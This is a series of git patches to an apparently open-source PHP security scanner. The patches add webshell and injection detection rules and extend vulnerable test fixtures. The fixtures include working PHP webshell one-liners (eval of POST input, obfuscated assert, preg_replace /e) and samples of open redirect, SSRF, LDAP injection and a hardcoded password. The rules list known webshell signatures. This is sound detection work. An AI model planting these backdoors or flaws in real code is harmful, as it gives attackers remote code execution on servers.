+<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell12"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index 4f2cf590..45693505 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -9,10 +9,33 @@ //cvi-360003 echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +//cvi-360004 +$string = 'AABBCCDDEE'; +preg_replace($_POST['A'], $_POST['B'], $string); + +//cvi-360005 ????? +$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); + +//cvi-360006 换行就挂 +$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); + //cvi-360007 array_map("ass\x65rt",(array)$_REQUEST['expdoor']); //cvi-360008 +//cvi-360009 +$e = $_REQUEST['e']; +$arr = array($_POST['pass'],); +array_filter($arr, base64_decode($e)); + +//cvi-360010 换行就挂 +$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); + +//cvi-360011 换行就挂 +$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); + +//cvi-360012 换行就挂 +$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); ?> From 70923c241d7f93dd46fe1e91718ebe118afab5dc Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 22:10:04 +0800 Subject: [PATCH 11/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell--=E7=89=B9?= =?UTF-8?q?=E5=BE=81=E6=89=AB=E6=8F=8F=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360032.xml | 20 ++++++++++++++++++++ rules/CVI-360033.xml | 20 ++++++++++++++++++++ 2 files changed, 40 insertions(+) create mode 100644 rules/CVI-360032.xml create mode 100644 rules/CVI-360033.xml diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml new file mode 100644 index 00000000..4b4ecbd0 --- /dev/null +++ b/rules/CVI-360032.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell12"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" + ]]> + + + + + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + + + + \ No newline at end of file diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml new file mode 100644 index 00000000..bb815d31 --- /dev/null +++ b/rules/CVI-360033.xml @@ -0,0 +1,20 @@ + + + + + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From d313dad00debb965691208df2bc263d1cc406b68 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 4 Sep 2017 19:07:13 +0800 Subject: [PATCH 12/29] tmp-version --- rules/CVI-140004.xml | 29 +++++---- rules/CVI-160001.xml | 1 - rules/CVI-165001.xml | 30 +++++++++ rules/CVI-180002.xml | 24 ++++---- rules/CVI-200002.xml | 7 +-- rules/CVI-210001.xml | 2 +- rules/CVI-220001.xml | 3 +- rules/CVI-360004.xml | 2 +- rules/CVI-360010.xml | 0 rules/CVI-360012.xml | 4 +- rules/CVI-360013.xml | 0 rules/CVI-360014.xml | 0 rules/CVI-360015.xml | 0 rules/CVI-360016.xml | 0 rules/CVI-360017.xml | 0 rules/CVI-360018.xml | 0 rules/CVI-360019.xml | 0 rules/CVI-360020.xml | 0 rules/CVI-360021.xml | 0 rules/CVI-360022.xml | 0 rules/CVI-360023.xml | 0 rules/CVI-360024.xml | 0 rules/CVI-360025.xml | 0 rules/CVI-360026.xml | 0 rules/CVI-360027.xml | 0 rules/CVI-360028.xml | 0 rules/CVI-360029.xml | 0 rules/CVI-360030.xml | 0 rules/CVI-360031.xml | 0 rules/CVI-360032.xml | 2 +- rules/CVI-360033.xml | 2 +- rules/CVI-360034.xml | 20 ++++++ rules/CVI-360035.xml | 0 rules/CVI-360036.xml | 0 rules/CVI-360037.xml | 0 rules/CVI-360038.xml | 0 rules/CVI-360039.xml | 0 rules/CVI-360040.xml | 0 rules/CVI-360041.xml | 0 rules/CVI-360042.xml | 0 rules/CVI-360043.xml | 0 rules/CVI-360044.xml | 0 rules/CVI-360045.xml | 0 rules/CVI-360046.xml | 0 rules/CVI-360047.xml | 0 rules/CVI-360048.xml | 0 rules/CVI-360049.xml | 0 rules/CVI-360050.xml | 0 rules/CVI-360051.xml | 0 rules/CVI-360052.xml | 0 tests/vulnerabilities/v.java | 4 +- tests/vulnerabilities/v.php | 39 ++++++++++++ tests/vulnerabilities/webshell.php | 98 ++++++++++++++++++++++++++++-- 53 files changed, 222 insertions(+), 45 deletions(-) create mode 100644 rules/CVI-165001.xml create mode 100644 rules/CVI-360010.xml create mode 100644 rules/CVI-360013.xml create mode 100644 rules/CVI-360014.xml create mode 100644 rules/CVI-360015.xml create mode 100644 rules/CVI-360016.xml create mode 100644 rules/CVI-360017.xml create mode 100644 rules/CVI-360018.xml create mode 100644 rules/CVI-360019.xml create mode 100644 rules/CVI-360020.xml create mode 100644 rules/CVI-360021.xml create mode 100644 rules/CVI-360022.xml create mode 100644 rules/CVI-360023.xml create mode 100644 rules/CVI-360024.xml create mode 100644 rules/CVI-360025.xml create mode 100644 rules/CVI-360026.xml create mode 100644 rules/CVI-360027.xml create mode 100644 rules/CVI-360028.xml create mode 100644 rules/CVI-360029.xml create mode 100644 rules/CVI-360030.xml create mode 100644 rules/CVI-360031.xml create mode 100644 rules/CVI-360034.xml create mode 100644 rules/CVI-360035.xml create mode 100644 rules/CVI-360036.xml create mode 100644 rules/CVI-360037.xml create mode 100644 rules/CVI-360038.xml create mode 100644 rules/CVI-360039.xml create mode 100644 rules/CVI-360040.xml create mode 100644 rules/CVI-360041.xml create mode 100644 rules/CVI-360042.xml create mode 100644 rules/CVI-360043.xml create mode 100644 rules/CVI-360044.xml create mode 100644 rules/CVI-360045.xml create mode 100644 rules/CVI-360046.xml create mode 100644 rules/CVI-360047.xml create mode 100644 rules/CVI-360048.xml create mode 100644 rules/CVI-360049.xml create mode 100644 rules/CVI-360050.xml create mode 100644 rules/CVI-360051.xml create mode 100644 rules/CVI-360052.xml diff --git a/rules/CVI-140004.xml b/rules/CVI-140004.xml index 45a1491d..7dd56c23 100644 --- a/rules/CVI-140004.xml +++ b/rules/CVI-140004.xml @@ -1,22 +1,27 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="获取URI或参数未过滤导致的XSS"/> - <language value="lua"/> - <match mode="regex-only-match"><![CDATA[ngx.say\s*\(\s*ngx\.(var|req)\.(request_uri|uri|get_uri_args\(\)|get_post_args\(\))]]></match> + <name value="echo或print直接输出入参导致XSS"/> + <language value="php"/> + <match mode="regex-param-controllable"><![CDATA[(echo|print)\s*(\()?\s*.*\s*(,\s*.*)*(\))?;]]></match> + <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> <level value="4"/> + <test> + <case assert="true"><![CDATA[echo ($_GET['test']);]]></case> + <case assert="true"><![CDATA[echo $_GET['test'];]]></case> + <case assert="true"><![CDATA[print("Hello " . $_GET["name"]);]]></case> + <case assert="true"><![CDATA[print 'foo is $_GET['test']';]]></case> + </test> <solution> ## 安全风险 - 未过滤的URI和参数直接输出可导致XSS + 直接输出入参会导致XSS ## 修复方案 - 输出时进行过滤 + 1. 使用`htmlentities`函数进行转义 + ```php + print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8"); + ``` + 2. 使用Begis安全组件对参数进行过滤后使用 </solution> - <test> - <case assert="true"><![CDATA[ - ngx.say(ngx.req.get_uri_args().name) - ]]></case> - </test> <status value="on"/> - <author name="JoyChou" email="viarus@qq.com"/> + <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-160001.xml b/rules/CVI-160001.xml index 5f92722e..1c99a3ab 100644 --- a/rules/CVI-160001.xml +++ b/rules/CVI-160001.xml @@ -1,5 +1,4 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="拼接SQL注入"/> <language value="java"/> diff --git a/rules/CVI-165001.xml b/rules/CVI-165001.xml new file mode 100644 index 00000000..70cfa449 --- /dev/null +++ b/rules/CVI-165001.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="LDAP注入"/> + <language value="php"/> + <match mode="function-param-controllable"><![CDATA[(ldap_add|ldap_delete|ldap_list|ldap_read|ldap_search|ldap_bind)]]></match> + <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair> + <level value="5"/> + <test> + <case assert="true"><![CDATA[ + $surname=$_GET['surname']; + $filter = "(sn=" . $surname . ")"; + $sr=ldap_search($ds, "o=My Company, c=US", $filter); + $info = ldap_get_entries($ds, $sr); + ]]></case> + </test> + <solution> + ## 安全风险 + + LDAP Injection + 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 + 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 + + ## 修复方案 + 对用户输入数据中包含的”语言本身的保留字符”进行转义(例如可以使用`ldap_escape`) + + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> + diff --git a/rules/CVI-180002.xml b/rules/CVI-180002.xml index 155dff4b..28036b9c 100644 --- a/rules/CVI-180002.xml +++ b/rules/CVI-180002.xml @@ -1,24 +1,22 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="远程代码执行"/> + <name value="$func$"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[array_map|create_function|call_user_func_array|call_user_func|assert|eval]]></match> - <level value="10"/> + <match mode="regex-only-match"><![CDATA[\b^.*`.*`.*$]]></match> + <level value="6"/> + <test> + <case assert="true"><![CDATA[ + $output = `ls -al`; + echo "<pre>$output</pre>"; + ]]></case> + + </test> <solution> ## 安全风险 - 一句话导致远程代码执行 + 远程代码执行 ## 修复方案 - 删除 </solution> - <test> - <case assert="true"><![CDATA[eval($_GET['pass']);]]></case> - <case assert="true"><![CDATA[assert($_GET['pass']);]]></case> - <case assert="true"><![CDATA[call_user_func($_GET['pass1'],$_GET['pass2']);]]></case> - <case assert="true"><![CDATA[create_function('$_GET['pass']',"echo $a");]]></case> - <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-200002.xml b/rules/CVI-200002.xml index 509dc52f..0b076633 100644 --- a/rules/CVI-200002.xml +++ b/rules/CVI-200002.xml @@ -1,10 +1,12 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="不安全的随机数"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[uniqid\s?\(]]></match> <level value="2"/> + <test> + <case assert="true"><![CDATA[$uniq = uniqid();]]></case> + </test> <solution> ## 安全风险 uniqid基于时间戳生成的,属于伪随机生成器,不建议使用。 @@ -12,9 +14,6 @@ ## 修复方案 使用random替代 </solution> - <test> - <case assert="true"><![CDATA[$uniq = uniqid();]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-210001.xml b/rules/CVI-210001.xml index 8068757c..20af97e9 100644 --- a/rules/CVI-210001.xml +++ b/rules/CVI-210001.xml @@ -3,6 +3,7 @@ <name value="未经验证的任意链接跳转"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[header]]></match> + <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> @@ -25,7 +26,6 @@ 4. 设置URL跳转白名单。 5. 当用户跳转离开时,强制跳转到警告页面上,提示用户正在离开当前网站。 - ## 修复方案 使用白名单判断 ```php <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml index 863f50c5..a135d6a2 100644 --- a/rules/CVI-220001.xml +++ b/rules/CVI-220001.xml @@ -2,7 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="HRS(CRLF)"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[header\s*\(\s*[^;]*\$_(GET|POST|REQUEST|SERVER|COOKIE)]]></match> + <match mode="function-param-controllable"><![CDATA[header]]></match> + <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml index f48a0676..cfba3695 100644 --- a/rules/CVI-360004.xml +++ b/rules/CVI-360004.xml @@ -3,7 +3,7 @@ <name value="webshell4"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) + (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) ]]></match> <level value="7"/> <test> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml index 2ec1505f..bb08c944 100644 --- a/rules/CVI-360012.xml +++ b/rules/CVI-360012.xml @@ -3,8 +3,8 @@ <name value="webshell12"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) - ]]></match> + \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) +]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index 4b4ecbd0..db6f822e 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell32"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index bb815d31..5b136bd9 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,6 +1,6 @@ - + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml new file mode 100644 index 00000000..73732db8 --- /dev/null +++ b/rules/CVI-360034.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell12"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360038.xml b/rules/CVI-360038.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml new file mode 100644 index 00000000..e69de29b diff --git a/tests/vulnerabilities/v.java b/tests/vulnerabilities/v.java index c18bf405..7c0cb144 100644 --- a/tests/vulnerabilities/v.java +++ b/tests/vulnerabilities/v.java @@ -10,12 +10,12 @@ String generateSecretToken() { } try: - # CVI-110001 + # CVI-330001 Cipher c = Cipher.getInstance("DESede/CBC/PKCS5Padding"); c.init(Cipher.ENCRYPT_MODE, k, iv); byte[] cipherText = c.doFinal(plainText); - # CVI-110002 + # CVI-330002 Cipher c = Cipher.getInstance("AES/ECB/NoPadding"); c.init(Cipher.ENCRYPT_MODE, k, iv); byte[] cipherText = c.doFinal(plainText); diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index f326bd01..3f77d873 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -100,3 +100,42 @@ function curl($url){ unlink($file); } + +header("Location: ".$_GET["url"]); + +$host = $_POST['host']; +$port = $_POST['port']; +function GetFile($host,$port,$link) +{ + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + if (!$fp) + { + echo "$errstr (error number $errno) \n"; + } + else + { + $out = "GET $link HTTP/1.1\r\n"; + $out .= "Host: $host\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "\r\n"; + fwrite($fp, $out); + $contents=''; + while (!feof($fp)) + { + $contents.= fgets($fp, 1024); + } + fclose($fp); + return $contents; + } +} + + +$surname=$_GET['surname']; +$filter = "(sn=" . $surname . ")"; +$sr=ldap_search($ds, "o=My Company, c=US", $filter); +$info = ldap_get_entries($ds, $sr); + + +$redis = new Redis(); +$redis->connect('192.168.1.2', 6379); +$redis->auth('passwd123!#'); diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index 45693505..c6802f03 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -7,14 +7,17 @@ include("sss.jpg"); //cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a); //cvi-360004 $string = 'AABBCCDDEE'; preg_replace($_POST['A'], $_POST['B'], $string); -//cvi-360005 ????? -$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); + +$user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); + +$b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; + //cvi-360006 换行就挂 $b = $_POST['B']; preg_replace($_POST['A'], $b, $string); @@ -30,12 +33,95 @@ array_filter($arr, base64_decode($e)); //cvi-360010 换行就挂 -$e = 